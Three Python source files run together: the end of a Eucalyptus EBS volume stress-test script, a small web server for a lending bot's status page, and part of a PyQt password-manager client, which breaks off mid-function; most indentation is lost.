overall_deleting = None
overall_deleted = None
overall_failed = None
    def iscsivolumeinfo_db_dump(self):
"""
Print contents of iscsivolumeinfo relation in eucalyptus_storage table
"""
now = datetime.datetime.now()
iscsivolinfo_file = "~/iscsivolinfo_file-" + str(now.microsecond) + ".txt"
db_dump = ""
for machine in self.tester.get_component_machines("clc"):
machine.sys("psql -p 8777 -x -e -t -S -h ${EUCALYPTUS}/var/lib/eucalyptus/db/data eucalyptus_storage -c 'select * from iscsivolumeinfo' -o " + iscsivolinfo_file)
db_dump = (machine.sys("cat " + iscsivolinfo_file))
machine.sys("rm -rf " + iscsivolinfo_file)
self.tester.debug("##########################################\n")
self.tester.debug("\t**** Content of iscsivolumeinfo relation ****\n")
for content in db_dump:
self.tester.debug(content + "\n")
self.tester.debug("##########################################\n")
now = None
iscsivolinfo_file = None
db_dump = None
def iscsimetadata_db_dump(self):
"""
Print contents of iscsimetadata relation in eucalyptus_storage table
"""
now = datetime.datetime.now()
iscsimetadata_file = "~/iscsimetadata_file-" + str(now.microsecond) + ".txt"
db_dump = ""
for machine in self.tester.get_component_machines("clc"):
machine.sys("psql -p 8777 -x -e -t -S -h ${EUCALYPTUS}/var/lib/eucalyptus/db/data eucalyptus_storage -c 'select * from iscsimetadata' -o " + iscsimetadata_file)
db_dump = (machine.sys("cat " + iscsimetadata_file))
machine.sys("rm -rf " + iscsimetadata_file)
self.tester.debug("##########################################\n")
self.tester.debug("\t**** Content of iscsimetadata relation ****\n")
for content in db_dump:
self.tester.debug(content + "\n")
self.tester.debug("##########################################\n")
now = None
        iscsimetadata_file = None
db_dump = None
def volumes_db_dump(self):
"""
Print contents of volumes relation in eucalyptus_storage table
"""
now = datetime.datetime.now()
volumes_file = "~/volumes_file-" + str(now.microsecond) + ".txt"
db_dump = ""
for machine in self.tester.get_component_machines("clc"):
machine.sys("psql -p 8777 -x -e -t -S -h ${EUCALYPTUS}/var/lib/eucalyptus/db/data eucalyptus_storage -c 'select * from volumes' -o " + volumes_file)
db_dump = (machine.sys("cat " + volumes_file))
machine.sys("rm -rf " + volumes_file)
self.tester.debug("##########################################\n")
self.tester.debug("\t**** Content of volume relation ****\n")
for content in db_dump:
self.tester.debug(content + "\n")
self.tester.debug("##########################################\n")
now = None
        volumes_file = None
db_dump = None
def cloudmetadata_db_dump(self):
"""
Print contents of metadata_volumes relation in eucalyptus_cloud table
"""
now = datetime.datetime.now()
cloudmetadata_file = "~/cloudmetadata_file-" + str(now.microsecond) + ".txt"
db_dump = ""
for machine in self.tester.get_component_machines("clc"):
machine.sys("psql -p 8777 -x -e -t -S -h ${EUCALYPTUS}/var/lib/eucalyptus/db/data eucalyptus_cloud -c 'select * from metadata_volumes' -o " + cloudmetadata_file)
db_dump = (machine.sys("cat " + cloudmetadata_file))
machine.sys("rm -rf " + cloudmetadata_file)
self.tester.debug("##########################################\n")
self.tester.debug("\t**** Content of metadata_volumes relation ****\n")
for content in db_dump:
self.tester.debug(content + "\n")
self.tester.debug("##########################################\n")
now = None
        cloudmetadata_file = None
db_dump = None
def storagestats_db_dump(self):
"""
Print contents of storage_stats_info relation in eucalyptus_storage table
"""
now = datetime.datetime.now()
storagestats_file = "~/storagestats_file-" + str(now.microsecond) + ".txt"
db_dump = ""
for machine in self.tester.get_component_machines("clc"):
machine.sys("psql -p 8777 -x -e -t -S -h ${EUCALYPTUS}/var/lib/eucalyptus/db/data eucalyptus_storage -c 'select * from storage_stats_info' -o " + storagestats_file)
db_dump = (machine.sys("cat " + storagestats_file))
machine.sys("rm -rf " + storagestats_file)
self.tester.debug("##########################################\n")
self.tester.debug("\t**** Content of storage_stats_info relation ****\n")
for content in db_dump:
self.tester.debug(content + "\n")
self.tester.debug("##########################################\n")
now = None
        storagestats_file = None
db_dump = None
    def run_command_list(self, machine, commands):
        for command in commands:
            machine.sys(command)
def get_clc_stats(self):
basic_commands = ['df -B M',
'ps aux',
'free',
'uptime']
clc_commands = ['euca-describe-properties | grep volume']
clc_status = clc_commands + basic_commands
for machine in self.tester.get_component_machines("clc"):
for command in clc_status:
machine.sys("source " + self.tester.credpath + "/eucarc && " + command)
def get_sc_stats(self):
basic_commands = ['df -B M',
'ps aux',
'free',
'uptime']
"""
Grab cloud property for volume location to get stats of files.
"""
volumes_dir = ""
for machine in self.tester.get_component_machines("clc"):
if volumes_dir == "":
volumes_dir = (machine.sys("source " + self.tester.credpath + "/eucarc && euca-describe-properties | grep volumesdir | awk '{print $3}'"))
sc_commands = ['tgtadm --lld iscsi --op show --mode account',
'tgtadm --lld iscsi --op show --mode target',
'du -sh ' + volumes_dir[0],
'lvdisplay | grep "/dev/vg-"',
'vgdisplay',
'pvdisplay',
'losetup -a | grep ' + volumes_dir[0] + ' | wc -l',
'ls -l ' + volumes_dir[0]]
sc_status = basic_commands + sc_commands
for machine in self.tester.get_component_machines("sc"):
self.run_command_list(machine, sc_status)
def GenerateVolumesLoad(self):
"""
Grab EBS Timeout property of Cloud
"""
ebs_timeout = ""
for machine in self.tester.get_component_machines("clc"):
if ebs_timeout == "":
ebs_timeout = (machine.sys("source " + self.tester.credpath + "/eucarc && euca-describe-properties | grep ebs_volume_creation_timeout | awk '{print $3}'"))
"""
Create volumes in series
"""
for i in xrange(options.number_of_vol):
volume = self.tester.create_volume(self.zone)
if volume is not None:
self.volumes.append(volume)
self.statuses.append(volume.status)
"""
        Sleep for the cloud's EBS timeout; this only needs to be done once
"""
self.tester.debug("###\n")
self.tester.debug("###\tWaiting till EBS Timeout is reached; sleep for " + ebs_timeout[0] + " seconds.\n")
self.tester.debug("###\n")
self.tester.sleep(float(ebs_timeout[0]))
def GenerateVolumesBoto(self):
"""
Grab EBS Timeout property of Cloud
"""
ebs_timeout = ""
for machine in self.tester.get_component_machines("clc"):
if ebs_timeout == "":
ebs_timeout = (machine.sys("source " + self.tester.credpath + "/eucarc && euca-describe-properties | grep ebs_volume_creation_timeout | awk '{print $3}'"))
"""
Create 1 Gig volumes in series
"""
vol_size = 1
for i in xrange(options.number_of_vol):
volume = self.tester.ec2.create_volume(vol_size, self.zone)
if volume is not None:
self.tester.debug("Volume (" + volume.id + ") is in (" + volume.status + ") state.\n")
self.volumes.append(volume)
self.statuses.append(volume.status)
"""
        Sleep for the cloud's EBS timeout; this only needs to be done once
"""
self.tester.debug("###\n")
self.tester.debug("###\tWaiting till EBS Timeout is reached; sleep for " + ebs_timeout[0] + " seconds.\n")
self.tester.debug("###\n")
self.tester.sleep(float(ebs_timeout[0]))
def GenerateCloudStatistics(self):
"""
Grab status of all volumes on cloud, along with database information
"""
self.overall_ebs_reporting()
"""
Display information in eucalyptus_storage,eucalyptus_cloud tables related to EBS -
* eucalyptus_storage relations: iscsivolumeinfo, iscsimetadata, volumes, storage_stats_info
* eucalyptus_cloud relations: metadata_volumes
"""
        self.iscsivolumeinfo_db_dump()
self.iscsimetadata_db_dump()
self.volumes_db_dump()
self.cloudmetadata_db_dump()
self.storagestats_db_dump()
def EbsStress(self, testcase="GenerateVolumesLoad"):
"""
Generate volume load; For each thread created - options.number_of_threads
- options.number_of_vol will be created
"""
from multiprocessing import Process
from multiprocessing import Queue
        ### Increase the start delay by 'step' seconds on each iteration
### This also gives enough time for creds to be pulled from CLC
step = 10
"""
If extra debugging is set, print additional CLC and SC information
"""
if options.print_debug is True:
self.get_clc_stats()
self.get_sc_stats()
thread_pool = []
queue_pool = []
## Start asynchronous activity
        ## Run the GenerateVolumesLoad test case 'step' seconds apart
for i in xrange(options.number_of_threads):
q = Queue()
queue_pool.append(q)
p = Process(target=self.run_testcase_thread, args=(q, step * i,testcase))
thread_pool.append(p)
self.tester.debug("Starting Thread " + str(i) +" in " + str(step * i))
p.start()
fail_count = 0
### Block until the script returns a result
for queue in queue_pool:
test_result = queue.get(True)
self.tester.debug("Got Result: " + str(test_result) )
fail_count += test_result
for thread in thread_pool:
thread.join()
if fail_count > 0:
self.tester.critical("Failure detected in one of the " + str(fail_count) + " " + testcase + " tests")
self.tester.debug("Successfully completed EbsStress test")
def EbsBotoStress(self, testcase="GenerateVolumesBoto"):
"""
Generate volume load; For each thread created - options.number_of_threads
- options.number_of_vol will be created
"""
from multiprocessing import Process
from multiprocessing import Queue
        ### Increase the start delay by 'step' seconds on each iteration
### This also gives enough time for creds to be pulled from CLC
step = 10
"""
If extra debugging is set, print additional CLC and SC information
"""
if options.print_debug is True:
self.get_clc_stats()
self.get_sc_stats()
thread_pool = []
queue_pool = []
## Start asynchronous activity
        ## Run the GenerateVolumesBoto test case 'step' seconds apart
for i in xrange(options.number_of_threads):
q = Queue()
queue_pool.append(q)
p = Process(target=self.run_testcase_thread, args=(q, step * i,testcase))
thread_pool.append(p)
self.tester.debug("Starting Thread " + str(i) +" in " + str(step * i))
p.start()
fail_count = 0
### Block until the script returns a result
for queue in queue_pool:
test_result = queue.get(True)
self.tester.debug("Got Result: " + str(test_result) )
fail_count += test_result
for thread in thread_pool:
thread.join()
if fail_count > 0:
self.tester.critical("Failure detected in one of the " + str(fail_count) + " " + testcase + " tests")
self.tester.debug("Successfully completed EbsBotoStress test")
    def run_testcase_thread(self, queue, delay=20, testname=None):
### Thread that runs a testcase (function) and returns its pass or fail result
self.tester.sleep(delay)
try:
result = unittest.TextTestRunner(verbosity=2).run(LoadGenerator(testname))
except Exception, e:
queue.put(1)
raise e
if result.wasSuccessful():
self.tester.debug("Passed test: " + testname)
queue.put(0)
return False
else:
self.tester.debug("Failed test: " + testname)
queue.put(1)
return True
def get_options():
### Parse args
## If given command line arguments, use them as test names to launch
parser = argparse.ArgumentParser(prog="ebs_stress.py",
version="Test Case [ebs_stress.py] Version 0.0.1",
description='Run stress testing operations on a cloud to test Eucalyptus Storage Controller \
functionality. This also tests disk, database, lvm, and loopback device integrity before and \
after the test has been executed.')
parser.add_argument("-U", "--username", dest="username",
help="User account on physical CC and CLC machine", default="root")
parser.add_argument("--clc-password", dest="clc_password",
help="Password for user account on physical CLC machine", default=None)
parser.add_argument("--config_file", dest="config_file",
help="Cloud config of AZ", default=None)
parser.add_argument("-n", "--number", dest="number_of_vol", type=int,
help="Number of volumes to create", default=10)
parser.add_argument("-t", "--thread_number", dest="number_of_threads", type=int,
help="Number of threads to create for concurrent testing", default=2)
parser.add_argument("-d", "--debug", action="store_true", dest="print_debug",
help="Whether or not to print debugging")
parser.add_argument('--xml', action="store_true", default=False)
parser.add_argument('--tests', nargs='+', default= ["EbsStress","GenerateCloudStatistics","EbsBotoStress","GenerateCloudStatistics"])
parser.add_argument('unittest_args', nargs='*')
## Grab arguments passed via commandline
options = parser.parse_args()
sys.argv[1:] = options.unittest_args
return options
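## A minimal example invocation (hypothetical file names and counts, not a recommended setup):
##   python ebs_stress.py --config_file cloud.conf --clc-password secret -n 5 -t 2 -d \
##       --tests EbsStress GenerateCloudStatistics
## With -t 2 and -n 5, each stress test starts 2 threads and each thread creates 5 volumes,
## so roughly 10 volumes are created per stress test.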
if __name__ == "__main__":
## If given command line arguments, use them as test names to launch
options = get_options()
for test in options.tests:
if options.xml:
file = open("test-" + test + "result.xml", "w")
result = xmlrunner.XMLTestRunner(file).run(LoadGenerator(test))
else:
result = unittest.TextTestRunner(verbosity=2).run(LoadGenerator(test))
        if not result.wasSuccessful():
            exit(1)
|
WebServer.py
|
# coding=utf-8
import threading
import os
server = None
web_server_ip = "0.0.0.0"
web_server_port = "8000"
web_server_template = "www"
def initialize_web_server(config):
'''
Setup the web server, retrieving the configuration parameters
and starting the web server thread
'''
global web_server_ip, web_server_port, web_server_template
# Check for custom web server address
compositeWebServerAddress = config.get('BOT', 'customWebServerAddress', '0.0.0.0').split(":")
# associate web server ip address
web_server_ip = compositeWebServerAddress[0]
# check for IP:PORT legacy format
if (len(compositeWebServerAddress) > 1):
# associate web server port
web_server_port = compositeWebServerAddress[1]
else:
# Check for custom web server port
web_server_port = config.get('BOT', 'customWebServerPort', '8000')
# Check for custom web server template
web_server_template = config.get('BOT', 'customWebServerTemplate', 'www')
print('Starting WebServer at {0} on port {1} with template {2}'
.format(web_server_ip, web_server_port, web_server_template))
thread = threading.Thread(target=start_web_server)
    thread.daemon = True
thread.start()
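# A sketch of the two configuration styles initialize_web_server() accepts; the section and key
# names come from the calls above, the values are only examples:
#
#   [BOT]
#   customWebServerAddress = 0.0.0.0:8000      ; legacy IP:PORT form, port parsed from the address
#
#   [BOT]
#   customWebServerAddress = 127.0.0.1         ; address only
#   customWebServerPort = 8080                 ; port read from its own key
#   customWebServerTemplate = www              ; folder served relative to the working directory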
def start_web_server():
'''
Start the web server
'''
import SimpleHTTPServer
import SocketServer
import socket
try:
port = int(web_server_port)
host = web_server_ip
# Do not attempt to fix code warnings in the below class, it is perfect.
class QuietHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
real_server_path = os.path.abspath(web_server_template)
# quiet server logs
def log_message(self, format, *args):
return
# serve from web_server_template folder under current working dir
def translate_path(self, path):
return SimpleHTTPServer.SimpleHTTPRequestHandler.translate_path(self, '/' + web_server_template + path)
def send_head(self):
local_path = self.translate_path(self.path)
if os.path.commonprefix((os.path.abspath(local_path), self.real_server_path)) != self.real_server_path:
self.send_error(404, "These aren't the droids you're looking for")
return None
return SimpleHTTPServer.SimpleHTTPRequestHandler.send_head(self)
global server
SocketServer.TCPServer.allow_reuse_address = True
server = SocketServer.TCPServer((host, port), QuietHandler)
if host == "0.0.0.0":
# Get all addresses that we could listen on the port specified
addresses = [i[4][0] for i in socket.getaddrinfo(socket.gethostname().split('.')[0], port)]
addresses = [i for i in addresses if ':' not in i] # Filter out all IPv6 addresses
addresses.append('127.0.0.1') # getaddrinfo doesn't always get localhost
hosts = list(set(addresses)) # Make list unique
else:
hosts = [host]
serving_msg = "http://{0}:{1}/lendingbot.html".format(hosts[0], port)
for host in hosts[1:]:
serving_msg += ", http://{0}:{1}/lendingbot.html".format(host, port)
print('Started WebServer, lendingbot status available at {0}'.format(serving_msg))
server.serve_forever()
except Exception as ex:
ex.message = ex.message if ex.message else str(ex)
print('Failed to start WebServer: {0}'.format(ex.message))
def stop_web_server():
'''
Stop the web server
'''
try:
print("Stopping WebServer")
threading.Thread(target=server.shutdown).start()
except Exception as ex:
ex.message = ex.message if ex.message else str(ex)
print("Failed to stop WebServer: {0}".format(ex.message))
|
ui.py
|
#!/usr/bin/python3
import sys, os
import signal
if getattr(sys, "frozen", False):
print(sys._MEIPASS)
from PyQt5.QtCore import pyqtProperty, QObject, QUrl, pyqtSlot, pyqtSignal
from PyQt5.QtCore import QAbstractListModel, QSortFilterProxyModel, QTimer
from PyQt5.QtGui import QGuiApplication, QClipboard, QIcon
from PyQt5.QtQml import (
qmlRegisterType,
QQmlComponent,
QQmlEngine,
QQmlApplicationEngine,
)
import threading
import client
import traceback
import crypto
import json
import time
import datetime
def addField(v, d, field):
if field in d:
v = v + str(d[field])
return v
def makeSortString(d):
ret = ""
if "website" in d and d["website"] is not None and len(d["website"]) > 0:
ret = addField(ret, d, "website").replace("www.", "")
elif "address" in d and d["address"] is not None and len(d["address"]) > 0:
ret = addField(ret, d, "address").replace("www.", "")
else:
ret = "zzz_"
ret = ret + " __ "
ret = addField(ret, d, "loginName")
ret = ret.upper()
return ret
def makeSearchString(d):
ret = ""
if "website" in d:
ret = " " + addField(ret, d, "website").replace("www.", "")
if "address" in d:
ret = " " + addField(ret, d, "address").replace("www.", "")
ret = " " + addField(ret, d, "loginName")
ret = " " + addField(ret, d, "notes")
return ret.lower()
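# Rough illustration of the two helpers above (hypothetical entry, outputs worked out by hand):
#   d = {"website": "www.example.com", "loginName": "alice"}
#   makeSortString(d)   -> "EXAMPLE.COM __ ALICE"   (upper-cased, "www." stripped)
#   makeSearchString(d) -> a lower-cased concatenation of website/address, loginName and notes,
#                          roughly "   example.comalice" for the entry above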
class Session:
def __init__(self):
self.clearSession()
def clearSession(self):
self._url = None
self._user = None
self._password = None
self._encryptedPrivateKey = None
self._authToken = None
self.client = None
self._privKey = None
self._secrets = None
self._passwords = []
self._passwordsModCounter = 0
self._lock = threading.Lock()
self._categories = {}
self._categoriesList = []
self._users = {}
self._categorySid = None
class PasswordInfo(QObject):
sigChanged = pyqtSignal(name="passwordInfoChanged")
def __init__(self, parent=None):
super().__init__(parent)
self._sid = None
@pyqtProperty("QString", notify=sigChanged)
def sid(self):
return self._sid
@sid.setter
def sid(self, sid):
print("Setting sid=" + sid)
self._sid = sid
for password in Midtier.session._passwords:
if "sid" in password and sid == password["sid"]:
self._password = password
print("Emitting changed signal")
self.sigChanged.emit()
@pyqtProperty("QString", notify=sigChanged)
def category(self):
try:
return str(self._password["category"])
except:
return "0"
@pyqtProperty("QString", notify=sigChanged)
def categoryLabel(self):
try:
return self._password["categoryLabel"]
except:
return "Unknown"
@pyqtProperty("QString", notify=sigChanged)
def categoryBackground(self):
try:
return self._password["categoryBackground"]
except:
return "#000000"
@pyqtProperty("QString", notify=sigChanged)
def categoryForeground(self):
try:
return self._password["categoryForeground"]
except:
return "#FFFFFF"
@pyqtProperty("QString", notify=sigChanged)
def displayName(self):
try:
return self._password["displayName"]
except:
return ""
@pyqtProperty("QString", notify=sigChanged)
def website(self):
try:
return self._password["website"]
except:
try:
return self._password["address"]
except:
return ""
@pyqtProperty("QString", notify=sigChanged)
def address(self):
try:
return self._password["address"]
except:
try:
return self._password["website"]
except:
return ""
@pyqtProperty(bool, notify=sigChanged)
def passwordHasNumbers(self):
try:
return any(char.isdigit() for char in self._password["password"])
except:
return False
@pyqtProperty(bool, notify=sigChanged)
def passwordHasUpper(self):
try:
return any(char.isupper() for char in self._password["password"])
except:
return False
@pyqtProperty(bool, notify=sigChanged)
def passwordHasLower(self):
try:
return any(char.islower() for char in self._password["password"])
except:
return False
@pyqtProperty(bool, notify=sigChanged)
def passwordHasSpecial(self):
try:
return any(not char.isalnum() for char in self._password["password"])
except:
return False
@pyqtProperty("QString", notify=sigChanged)
def password(self):
try:
return self._password["password"]
except:
return ""
@pyqtProperty("QString", notify=sigChanged)
def passwordStars(self):
try:
return ("*" * 8) + "{" + str(len(self._password["password"])) + "}"
except:
return ""
@pyqtProperty("QString", notify=sigChanged)
def loginName(self):
try:
return self._password["loginName"]
except:
return ""
@pyqtProperty("QString", notify=sigChanged)
def dateChanged(self):
try:
return self._password["dateChanged"]
except:
return ""
@pyqtProperty("QString", notify=sigChanged)
def notes(self):
try:
return self._password["notes"]
except:
return ""
class PasswordModel(QAbstractListModel):
def __init__(self, parent=None):
super().__init__(parent)
self._modCounter = 0
self._data = []
def rowCount(self, parent):
return len(self._getdata())
def data(self, index, role):
ret = self._getdata()[index.row()]
if role == 1:
ret = makeSearchString(ret)
# print("data("+str(index.row())+","+str(role)+")="+str(ret))
return ret
def _getdata(self):
with Midtier.session._lock:
if self._modCounter < Midtier.session._passwordsModCounter:
print(
"Refreshing model from "
+ str(self._modCounter)
+ " to "
+ str(Midtier.session._passwordsModCounter)
)
self._modCounter = Midtier.session._passwordsModCounter
self._data = sorted(
Midtier.session._passwords, key=lambda x: makeSortString(x)
)
return self._data
class MyProxyModel(QSortFilterProxyModel):
def __init__(self, parent=None):
super().__init__(parent)
self.setSourceModel(PasswordModel(parent))
self.setDynamicSortFilter(True)
self.setFilterRegExp("")
self.setFilterRole(1)
@pyqtProperty("QString")
def filterString(self):
return self.filterRegExp().pattern()
@filterString.setter
def filterString(self, f):
self.setFilterRegExp(f.lower())
class MyCategoryProxyModel(QSortFilterProxyModel):
def __init__(self, parent=None):
super().__init__(parent)
self.setSourceModel(CategoryModel(parent))
self.setDynamicSortFilter(True)
class Midtier(QObject):
error = pyqtSignal(str, arguments=["error"])
sigMessage = pyqtSignal(str, name="message", arguments=["message"])
sigDownloadKey = pyqtSignal(
str, name="downloadKey", arguments=["encryptedPrivateKey"]
)
sigDownloadSecrets = pyqtSignal(name="downloadSecrets")
sigDecryptedSecret = pyqtSignal(dict, name="decryptedSecret")
sigNewPassword = pyqtSignal(str, name="newPassword", arguments=["sid"])
sigUpdatedPassword = pyqtSignal(str, name="updatedPassword", arguments=["sid"])
sigNewCategory = pyqtSignal(str, name="newCategory", arguments=["cid"])
sigUsersListed = pyqtSignal(name="usersListed")
def __init__(self, parent=None):
super().__init__(parent)
self.helper = client.ClientHelper()
self.crypto = crypto.Crypto()
self.model = PasswordModel(self)
@pyqtProperty("QString")
def url(self):
return Midtier.session._url
@url.setter
def url(self, url):
Midtier.session._url = url
@pyqtProperty("QString")
def user(self):
return Midtier.session._user
@user.setter
def user(self, user):
Midtier.session._user = user
@pyqtProperty("QString")
def password(self):
return Midtier.session._password
@password.setter
def password(self, password):
Midtier.session._password = password
@pyqtProperty("QString")
def authToken(self):
return Midtier.session._authToken
@authToken.setter
def authToken(self, authToken):
Midtier.session._authToken = authToken
@pyqtProperty("QString")
def encryptedPrivateKey(self):
return Midtier.session._encryptedPrivateKey
@encryptedPrivateKey.setter
def encryptedPrivateKey(self, encryptedPrivateKey):
Midtier.session._encryptedPrivateKey = encryptedPrivateKey
@pyqtSlot()
def clearSession(self):
Midtier.session = Session()
self.sigMessage.emit("")
@pyqtProperty("QVariant")
def categories(self):
return sorted(Midtier.session._categoriesList, key=lambda x: x["text"])
@pyqtProperty("QVariant")
def otherUsers(self):
other = []
for username in Midtier.session._users.keys():
if username != Midtier.session._user:
other.append(
{
"username": username,
"name": Midtier.session._users[username]["displayName"],
}
)
print("userUsers=" + str(other))
return other
@pyqtSlot()
def getSecrets(self):
threading.Thread(target=(lambda: self._getSecrets())).start()
def _getSecrets(self):
try:
Midtier.session.client = client.Client(
client.ClientRestInterface(Midtier.session._url)
)
if self._login():
self.sigMessage.emit("Generating token")
Midtier.session._authToken = self.helper.generateToken(
Midtier.session._privKey
)
Midtier.session.client.login(
Midtier.session._user, Midtier.session._authToken
)
self.sigMessage.emit("Downloading secrets")
Midtier.session._secrets = Midtier.session.client.getSecretsForUser(
Midtier.session._user
)
self.sigMessage.emit("Finished downloading secrets")
self.sigDownloadSecrets.emit()
except Exception as e:
traceback.print_exc()
self.sigMessage.emit("")
self.error.emit(str(e))
@pyqtSlot(str)
def addPassword(self, value):
print("addPassword()")
threading.Thread(target=(lambda: self._addPassword(value))).start()
def _addPassword(self, value):
try:
obj = json.loads(value)
print(str(obj))
user = Midtier.session._user
self.sigMessage.emit("Downloading public key")
self._yield()
pubKey = Midtier.session.client.getUserPublicKey(user)
self.sigMessage.emit("Generating random keys")
self._yield()
aesKey = self.crypto.generateRandomKey()
hmacKey = self.crypto.generateRandomKey()
bothKeys = aesKey + hmacKey
rnd = self.crypto.encode(self.crypto.generateRandomKey())
secretValue = {}
secretValue["random"] = rnd
secretValue["website"] = obj["website"]
secretValue["address"] = obj["url"]
secretValue["loginName"] = obj["username"]
secretValue["password"] = obj["password"]
secretValue["type"] = "password"
secretValue["category"] = "0"
secretValue["userCategory"] = {}
for cat in Midtier.session._categoriesList:
try:
if cat["text"] == obj["category"]:
secretValue["category"] = cat["id"]
secretValue["userCategory"][user] = cat["id"]
except:
pass
secretValue["notes"] = ""
secretValue["dateChanged"] = datetime.date.today().isoformat()
self.sigMessage.emit("Encrypting password")
self._yield()
encryptedSecret = self.crypto.encrypt(aesKey, json.dumps(secretValue))
encryptedKey = self.crypto.encryptRSA(pubKey, bothKeys)
hmac = str(self.crypto.createHmac(hmacKey, encryptedSecret))
eek = str(self.crypto.encode(encryptedKey))
self.sigMessage.emit("Uploading encrypted password")
self._yield()
secret = Midtier.session.client.addSecret(
user, "1", eek, encryptedSecret, hmac
)
sid = secret["sid"]
secretValue["sid"] = sid
print("Secret ID: " + str(sid))
self.sigMessage.emit("Successfully uploaded encrypted password")
with Midtier.session._lock:
self.updatePasswordCategoryInfo(secretValue)
Midtier.session._passwords.append(secretValue)
Midtier.session._passwordsModCounter += 1
self.sigNewPassword.emit(sid)
except Exception as e:
traceback.print_exc()
self.sigMessage.emit("")
self.error.emit(str(e))
@pyqtSlot(str, str)
def updatePassword(self, sid, value):
print("updatePassword()")
threading.Thread(target=(lambda: self._updatePassword(sid, value))).start()
def _updatePassword(self, sid, value):
try:
obj = json.loads(value)
print(str(obj))
user = Midtier.session._user
privKey = Midtier.session._privKey
self.sigMessage.emit("Downloading public key")
self._yield()
pubKey = Midtier.session.client.getUserPublicKey(user)
self.sigMessage.emit("Downloading latest secret")
self._yield()
secretEntry = Midtier.session.client.getSecret(sid)
encryptedKey = self.crypto.decode(
secretEntry["users"][Midtier.session._user]["encryptedKey"]
)
encryptedSecret = secretEntry["encryptedSecret"]
self.sigMessage.emit("Decrypting the AES key")
origKeyPair = self.crypto.decryptRSA(privKey, encryptedKey)
origKey = origKeyPair[0:32]
hmacKey = origKeyPair[32:]
origSecretText = self.crypto.decrypt(origKey, encryptedSecret)
origSecret = json.loads(origSecretText.decode("utf-8"))
secretValue = origSecret
secretValue["website"] = obj["website"]
secretValue["address"] = obj["url"]
secretValue["loginName"] = obj["username"]
if secretValue["password"] != obj["password"]:
secretValue["password"] = obj["password"]
secretValue["dateChanged"] = datetime.date.today().isoformat()
for cat in Midtier.session._categoriesList:
try:
if cat["text"] == obj["category"]:
secretValue["category"] = cat["id"]
secretValue["userCategory"][user] = cat["id"]
except:
pass
self.sigMessage.emit("Encrypting password")
self._yield()
encryptedSecret = self.crypto.encrypt(origKey, json.dumps(secretValue))
hmac = str(self.crypto.createHmac(hmacKey, encryptedSecret))
self.sigMessage.emit("Uploading encrypted secret")
self._yield()
Midtier.session.client.updateSecret(
sid, encryptedSecret, hmac
)
self.sigMessage.emit("Uploaded encrypted secret")
self.sigMessage.emit("Updating information")
with Midtier.session._lock:
for password in Midtier.session._passwords:
if "sid" in password and password["sid"] == sid:
self.updatePasswordCategoryInfo(password)
password["website"] = obj["website"]
password["address"] = obj["url"]
password["loginName"] = obj["username"]
password["password"] = obj["password"]
if "dateChanged" in secretValue:
password["dateChanged"] = secretValue["dateChanged"]
Midtier.session._passwords.append(secretValue)
Midtier.session._passwordsModCounter += 1
self.sigUpdatedPassword.emit(sid)
except Exception as e:
traceback.print_exc()
self.sigMessage.emit("")
self.error.emit(str(e))
@pyqtSlot(str)
def addCategory(self, value):
print("addCategory()")
threading.Thread(target=(lambda: self._addCategory(value))).start()
# Midtier.session._categorySid
def _addCategory(self, value):
try:
obj = json.loads(value)
print(str(obj))
sid = Midtier.session._categorySid
user = Midtier.session._user
privKey = Midtier.session._privKey
self.sigMessage.emit("Downloading public key")
pubKey = Midtier.session.client.getUserPublicKey(user)
            if sid is None:
print("Creating category secret")
self.sigMessage.emit("Generating random keys")
self._yield()
aesKey = self.crypto.generateRandomKey()
hmacKey = self.crypto.generateRandomKey()
bothKeys = aesKey + hmacKey
rnd = self.crypto.encode(self.crypto.generateRandomKey())
secretValue = {}
secretValue["type"] = "passwordCategories"
secretValue["categories"] = {}
secretValue["categories"]["1"] = {}
secretValue["categories"]["1"]["label"] = obj["label"]
secretValue["categories"]["1"]["backgroundColor"] = str(
obj["background"]
).replace("#", "")
self.sigMessage.emit("Encrypting category")
self._yield()
encryptedSecret = self.crypto.encrypt(aesKey, json.dumps(secretValue))
encryptedKey = self.crypto.encryptRSA(pubKey, bothKeys)
hmac = str(self.crypto.createHmac(hmacKey, encryptedSecret))
eek = str(self.crypto.encode(encryptedKey))
self.sigMessage.emit("Uploading encrypted category")
self._yield()
secret = Midtier.session.client.addSecret(
user, "1", eek, encryptedSecret.decode("utf-8"), hmac
)
Midtier.session._categorySid = secret["sid"]
print("New category sid: " + secret["sid"])
with Midtier.session._lock:
self._updateCategoryList(secretValue)
self.sigNewCategory.emit("1")
else:
client = Midtier.session.client
self.sigMessage.emit("Downloading latest secret")
secretEntry = client.getSecret(sid)
encryptedKey = self.crypto.decode(
secretEntry["users"][Midtier.session._user]["encryptedKey"]
)
encryptedSecret = secretEntry["encryptedSecret"]
self.sigMessage.emit("Decrypting the AES key")
origKeyPair = self.crypto.decryptRSA(privKey, encryptedKey)
origKey = origKeyPair[0:32]
hmacKey = origKeyPair[32:]
self.sigMessage.emit("Decrypting the latest secret")
origSecretText = self.crypto.decrypt(origKey, encryptedSecret)
origSecret = json.loads(origSecretText.decode("utf-8"))
newId = "1"
if "categories" in origSecret:
catIds = []
catIds.extend(origSecret["categories"].keys())
catIds = sorted(catIds, key=lambda x: int(x))
catIds.reverse()
highest = catIds[0]
newId = str(int(highest) + 1)
print(
"highest category is "
+ str(highest)
+ ", new id is "
+ str(newId)
)
origSecret["categories"][newId] = {}
origSecret["categories"][newId]["label"] = obj["label"]
origSecret["categories"][newId]["backgroundColor"] = str(
obj["background"]
).replace("#", "")
else:
origSecret["categories"] = {}
origSecret["categories"]["1"] = {}
origSecret["categories"]["1"]["label"] = obj["label"]
origSecret["categories"]["1"]["backgroundColor"] = str(
obj["background"]
).replace("#", "")
self.sigMessage.emit("Encrypting categories")
self._yield()
encryptedSecret = self.crypto.encrypt(origKey, json.dumps(origSecret))
hmac = str(self.crypto.createHmac(hmacKey, encryptedSecret))
self.sigMessage.emit("Uploading encrypted categories")
self._yield()
client.updateSecret(sid, encryptedSecret.decode("utf-8"), hmac)
self.sigMessage.emit("Uploaded encrypted categories")
with Midtier.session._lock:
self._updateCategoryList(origSecret)
self.sigNewCategory.emit(newId)
except Exception as e:
traceback.print_exc()
self.sigMessage.emit("")
self.error.emit(str(e))
@pyqtSlot(str, str)
def shareSecret(self, sid, username):
threading.Thread(target=(lambda: self._shareSecret(sid, username))).start()
def _shareSecret(self, sid, username):
try:
client = Midtier.session.client
self.sigMessage.emit("Downloading " + username + "'s public key")
pubKey = client.getUserPublicKey(username)
privKey = Midtier.session._privKey
self.sigMessage.emit("Downloading latest secret")
secretEntry = client.getSecret(sid)
encryptedKey = self.crypto.decode(
